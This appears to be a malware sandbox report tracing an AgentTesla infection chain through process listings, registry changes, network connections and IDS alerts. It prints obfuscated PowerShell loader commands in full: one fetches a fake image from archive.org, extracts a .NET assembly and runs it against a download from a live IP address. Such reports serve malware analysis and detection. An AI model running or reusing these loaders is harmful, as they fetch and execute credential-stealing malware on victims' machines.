⢚ ⬑ ⾌YgBs♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌XQ♶ ━ ⢚ ⬑ ⾌6♶ ━ ⢚ ⬑ ⾌Do♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌YwBv♶ ━ ⢚ ⬑ ⾌G0♶ ━ ⢚ ⬑ ⾌bQBh♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌BC♶ ━ ⢚ ⬑ ⾌Hk♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bl♶ ━ ⢚ ⬑ ⾌HM♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌7♶ ━ ⢚ ⬑ ⾌CQ♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌B5♶ ━ ⢚ ⬑ ⾌H♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌ZQ♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌bwBh♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌ZQBk♶ ━ ⢚ ⬑ ⾌EE♶ ━ ⢚ ⬑ ⾌cwBz♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQBi♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌eQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ec♶ ━ ⢚ ⬑ ⾌ZQB0♶ ━ ⢚ ⬑ ⾌FQ♶ ━ ⢚ ⬑ ⾌eQBw♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌GQ♶ ━ ⢚ ⬑ ⾌bgBs♶ ━ ⢚ ⬑ ⾌Gk♶ ━ ⢚ ⬑ ⾌Yg♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌Tw♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌Eg♶ ━ ⢚ ⬑ ⾌bwBt♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌Jw♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌Ds♶ ━ ⢚ ⬑ ⾌J♶ ━ ⢚ ⬑ ⾌Bt♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌D0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌eQBw♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌LgBH♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌BN♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌G8♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌VgBB♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌Jw♶ ━ ⢚ ⬑ ⾌p♶ ━ ⢚ ⬑ ⾌C4♶ ━ ⢚ ⬑ ⾌SQBu♶ ━ ⢚ ⬑ ⾌HY♶ ━ ⢚ ⬑ ⾌bwBr♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌K♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌k♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌dQBs♶ ━ ⢚ ⬑ ⾌Gw♶ ━ ⢚ ⬑ ⾌L♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌g♶ ━ ⢚ ⬑ ⾌Fs♶ ━ ⢚ ⬑ ⾌bwBi♶ ━ ⢚ ⬑ ⾌Go♶ ━ ⢚ ⬑ ⾌ZQBj♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌WwBd♶ ━ ⢚ ⬑ ⾌F0♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌o♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌B4♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌LgB4♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌bQBB♶ ━ ⢚ ⬑ ⾌G4♶ ━ ⢚ ⬑ ⾌aQB0♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌T♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌v♶ ━ ⢚ ⬑ ⾌Dg♶ ━ ⢚ ⬑ ⾌Lg♶ ━ ⢚ ⬑ ⾌x♶ ━ ⢚ ⬑ ⾌D♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌MQ♶ ━ ⢚ ⬑ ⾌u♶ ━ ⢚ ⬑ ⾌DM♶ ━ ⢚ ⬑ ⾌Lg♶ ━ ⢚ ⬑ ⾌y♶ ━ ⢚ ⬑ ⾌Dk♶ ━ ⢚ ⬑ ⾌MQ♶ ━ ⢚ ⬑ ⾌v♶ ━ ⢚ ⬑ ⾌C8♶ ━ ⢚ ⬑ ⾌OgBw♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌d♶ ━ ⢚ ⬑ ⾌Bo♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌s♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBh♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQB2♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌s♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBh♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQB2♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌I♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌s♶ ━ ⢚ ⬑ ⾌C♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌JwBk♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBh♶ ━ ⢚ ⬑ ⾌HQ♶ ━ ⢚ ⬑ ⾌aQB2♶ ━ ⢚ ⬑ ⾌GE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bv♶ ━ ⢚ ⬑ ⾌Cc♶ ━ ⢚ ⬑ ⾌L♶ ━ ⢚ ⬑ ⾌♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌EE♶ ━ ⢚ ⬑ ⾌Z♶ ━ ⢚ ⬑ ⾌Bk♶ ━ ⢚ ⬑ ⾌Ek♶ ━ ⢚ ⬑ ⾌bgBQ♶ ━ ⢚ ⬑ ⾌HI♶ ━ ⢚ ⬑ ⾌bwBj♶ ━ ⢚ ⬑ ⾌GU♶ ━ ⢚ ⬑ ⾌cwBz♶ ━ ⢚ ⬑ ⾌DM♶ ━ ⢚ ⬑ ⾌Mg♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌Cw♶ ━ ⢚ ⬑ ⾌Jw♶ ━ ⢚ ⬑ ⾌n♶ ━ ⢚ ⬑ ⾌Ck♶ ━ ⢚ ⬑ ⾌KQ♶ ━ ⢚ ⬑ ⾌=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('♶ ━ ⢚ ⬑ ⾌','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6640 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6880 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.xemAnitaL/8.101.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (6576) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (6576) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (6576) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (6576) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (6880) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (6880) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (6880) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (6880) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (6880) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
| (PID) Process: | (6880) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6632 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5d0mz1t4.wra.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6632 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o4k11tov.nei.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5aafelqs.4ut.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6880 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:B071C78AC371030B146BD2E0F7A9F3C1 | SHA256:46269679E49FA0E1FFC719B86963EAE7B0E57214D84584E97DD7C6F24D49D186 | |||
| 6880 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mvnouafy.oa4.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4248 | AddInProcess32.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | US | text | 5 b | shared |
6400 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | DE | binary | 419 b | whitelisted |
6400 | SIHClient.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | DE | binary | 407 b | whitelisted |
2648 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | binary | 471 b | whitelisted |
6880 | powershell.exe | GET | 200 | 192.3.101.8:80 | http://192.3.101.8/LatinAmex.txt | US | text | 318 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
252 | RUXIMICS.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4436 | svchost.exe | 4.231.128.59:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6880 | powershell.exe | 207.241.232.154:443 | ia803104.us.archive.org | INTERNET-ARCHIVE | US | unknown |
4436 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3260 | svchost.exe | 40.113.110.67:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6880 | powershell.exe | 192.3.101.8:80 | — | AS-COLOCROSSING | US | malicious |
2120 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2648 | svchost.exe | 40.126.32.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
ia803104.us.archive.org |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
ip-api.com |
| shared |
ftp.horeca-bucuresti.ro |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
6880 | powershell.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 |
2256 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
4248 | AddInProcess32.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
4248 | AddInProcess32.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |
2256 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
4248 | AddInProcess32.exe | A Network Trojan was detected | ET MALWARE AgentTesla Exfil via FTP |
4248 | AddInProcess32.exe | Misc activity | INFO [ANY.RUN] FTP protocol command for uploading a file |
4248 | AddInProcess32.exe | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) |
4248 | AddInProcess32.exe | A Network Trojan was detected | STEALER [ANY.RUN] AgentTesla Exfiltration (raw TCP) |
4248 | AddInProcess32.exe | Misc activity | INFO [ANY.RUN] FTP server is ready for the new user |